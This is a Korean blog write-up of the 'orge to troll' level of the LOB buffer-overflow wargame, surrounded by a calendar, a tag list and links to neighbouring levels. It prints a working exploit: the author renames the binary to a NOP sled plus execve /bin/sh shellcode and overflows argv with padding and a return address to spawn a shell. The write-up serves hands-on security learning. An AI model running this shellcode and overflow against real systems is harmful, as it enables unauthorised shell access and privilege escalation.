| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | |||||
| 3 | 4 | 5 | 6 | 7 | 8 | 9 |
| 10 | 11 | 12 | 13 | 14 | 15 | 16 |
| 17 | 18 | 19 | 20 | 21 | 22 | 23 |
| 24 | 25 | 26 | 27 | 28 | 29 | 30 |
| 31 |
- argc
- kosis
- IS함수
- pyinstaller
- 데이터형
- lob
- R언어
- 빅데이터
- wolfman to darkelf
- pythoncli
- 쉘코드
- mode함수
- anxi0
- 자료개방포털
- 서니나타스
- lob 7번
- 써니나타스 1번
- lob 10번
- argv
- troll to
- 포너블
- 범용레지스터 #레지스터 #어셈블리 #ASM #리버싱 #어셈블리어 #EAX #ESP
- pythonexe
- lob 9번
- 마크업 언어
- kostat
- 써니나타스
- 결측치
- ultra argv hunter
- orge to troll
- Today
- Total
ANX1-Z3R0의 불안극복(不安克服)
009. orge to troll | anxi0 본문
orge to troll,
오우거랑 트롤인데,
둘이 뭐가 뭔지 솔직히 모르겠네;; 나만 그런가 (당신은 이미 답을 알고 있다!)
바로 가자.
^ 어디가 바뀌었다고 친절히 말해주는 lob
argc가 2개라니...
앗
그럼 다른 곳으로 써주면 되잖니!
음
파일명을 바꾸자. NOP + 쉘코드로
mv (move) 명령어는..... mv명령어
으쨋든 이제 방법을 알았으니 실행만 하면 된다!
<- mv troll `python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
(nop 너무 많이 넣으니깐 안 되더라....)
한 후 삽입
<- ./`python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` `python -c 'print "A"*44 + "BBB\xbf"'`
후 코어 확인
때리자
./`python -c 'print "\x90"*100 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'` `python -c 'print "A"*44 + "\xa0\xfa\xff\xbf"'`
교훈
1. 파이썬 킹갓 언어
2. 아는 게 있어야 문제를 푼다
(그러니 처음 풀땐 답지 본다고 생각하지 말고, 끙끙 앓지말고 보고 이해하자)
3. 포기하지 않는 당신, 멋지다
'HACKING > [SYSTEM HACKING] LOB' 카테고리의 다른 글
| 011. vampire to skeleton | anxi0 (0) | 2019.03.21 |
|---|---|
| 010. troll to vampire | anxi0 (0) | 2019.02.19 |
| 008. darkelf to orge | anxi0 (0) | 2019.02.18 |
| 007. wolfman to darkelf | anxi0 (0) | 2019.02.17 |
| 006. orc to wolfman | anxi0 (0) | 2019.02.17 |
